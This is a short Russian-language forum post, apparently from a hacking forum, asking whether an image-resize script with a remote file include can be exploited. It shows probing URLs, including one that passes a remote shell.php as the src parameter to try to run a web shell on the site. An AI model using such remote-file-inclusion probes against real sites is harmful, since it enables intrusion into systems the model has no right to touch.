не знаю уязвимость ли это и можно ли это как то юзать....

есть скрипт ресайза и в нём проходит глобальный инклуд, с картинками проходит на ура а вот с остальными форматами не понятно

http://site.com/lol.php?src=http://somesite.com/image.jpg

проблема в том что я не пойму исполняется ли такой код

http://site.com/lol.php?src=http://somesite.com/shell.php

потому что в ответ получаю вот что

получается что браузер выдаёт мне нерабочую картинку так как ответ возвращается в тЭге

скорее всего скрипт не фильтрует форматы файлов, так как подгружаются картинки даже таких видов как http://somesite.com/image.php?u=5199&dateline=11989523